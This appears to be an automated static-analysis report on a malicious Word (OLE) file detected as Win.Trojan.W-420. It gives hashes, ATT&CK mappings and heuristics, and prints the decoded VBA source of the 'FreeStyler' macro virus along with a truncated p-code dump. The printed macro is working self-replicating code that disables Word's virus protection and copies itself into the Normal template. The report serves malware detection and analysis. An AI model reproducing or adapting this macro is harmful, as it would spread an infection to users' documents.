Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9d87078fd8b68ebd…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 2000-09-12 01:26:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6b51a517c372f57e5c6d2ad186a6f3da
SHA-1: ea9e73ae0226f03ca3c0213287701b049a7930fa
SHA-256: 9d87078fd8b68ebdae62f5d46a5a6c35c61ea8d88cf7780dc687ce1a58b47161
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Win.Trojan.W-420. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The macros appear to be designed to manipulate the document and potentially download or execute further payloads.

Heuristics (3)

  • ClamAV: Win.Trojan.W-420 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.W-420
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro, which runs automatically when the document is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12270 bytes
SHA-256: d94b056be9ba87c01f2d6ad826a37934d80f327bcf5f6d804f8a94ae4d454019
Detection: ClamAV: Win.Trojan.W-420
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "FreeStyler"
Attribute VB_Base = "1Normal.FreeStyler"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
        Sub View()
        Document_New
        End Sub
Private Sub Document_Close()
On Error Resume Next
If ActiveDocument.Name = ActiveDocument.FullName Then Document_New: End
If ActiveDocument.Saved = True Then Call Document_Open Else End
End Sub
        Sub Macro()
        Document_New
        End Sub
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
ActiveDocument.ReadOnlyRecommended = 0: Application.ScreenUpdating = 0
Document_New
If ActiveDocument.ReadOnly = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
If NormalTemplate.VBProject.VBComponents.Item(1).Name = "FreeStyler" Then DOT = True
If ActiveDocument.VBProject.VBComponents.Item(1).Name = "FreeStyler" Then DOC = True
If DOT = True And DOC = True Then GoTo 1
If DOT = False Then
Set Acti = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
m = Acti.CodeModule.ProcBodyLine("Macro", vbext_ProcKind)
Acti.CodeModule.replaceline m, "        Sub ToolsMacro()"
a = Acti.CodeModule.ProcBodyLine("View", vbext_ProcKind)
Acti.CodeModule.replaceline a, "        Sub ViewVBcode()"
VV = Acti.CodeModule.Lines(1, FreeStyler.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule: .DeleteLines 1, .CountOfLines: .AddFromString VV: End With
NormalTemplate.VBProject.VBComponents.Item(1).Name = "FreeStyler"
m = Acti.CodeModule.ProcBodyLine("ToolsMacro", vbext_ProcKind)
Acti.CodeModule.replaceline m, "        Sub Macro()"
a = Acti.CodeModule.ProcBodyLine("ViewVBcode", vbext_ProcKind)
Acti.CodeModule.replaceline a, "        Sub View()"
End If
If DOC = False Then
Set Norma = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
m = Norma.ProcBodyLine("ToolsMacro", vbext_ProcKind)
Norma.replaceline m, "        Sub Macro()"
a = Norma.ProcBodyLine("ViewVBcode", vbext_ProcKind)
Norma.replaceline a, "        Sub View()"
CC = FreeStyler.VBProject.VBComponents.Item(1).CodeModule.Lines(1, FreeStyler.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule: .DeleteLines 1, .CountOfLines: .AddFromString CC: End With
ActiveDocument.VBProject.VBComponents.Item(1).Name = "FreeStyler"
m = Norma.ProcBodyLine("Macro", vbext_ProcKind)
Norma.replaceline m, "        Sub ToolsMacro()"
a = Norma.ProcBodyLine("View", vbext_ProcKind)
Norma.replaceline a, "        Sub ViewVBcode()"
Document_New
End If
If ActiveDocument.FullName = wdOpenFormatDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
1: ActiveDocument.Saved = True
End Sub
Private Sub Document_New()
On Error Resume Next
'VOVAN//SMF
Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0
B = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
C = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
xxx = Mid(B, 13): fff = Len(xxx) - 2: hhh = Left(xxx, fff)
Number = MacroContainer.VBProject.VBComponents(1).CodeModule.ProcCountLines(hhh, vbext_pk_Proc)
VV = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Number)
With MacroContainer.VBProject.VBComponents.Item(1).CodeModule
.DeleteLines 1, Number
.InsertLines C, VV
End With
End Sub

' Processing file: /opt/analyzer/scan_staging/332e618126924580b42df98b2a8cc0f4.bin
' ===============================================================================
' Module streams:
' Macros/VBA/FreeStyler - 5211 bytes
' Line #0:
' 	FuncDefn (Sub View())
' Line #1:
' 	ArgsCall Document_New 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' Line #4:
' 	OnError (Resume Next) 
' Line #5:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	Ld ActiveDo
... (truncated)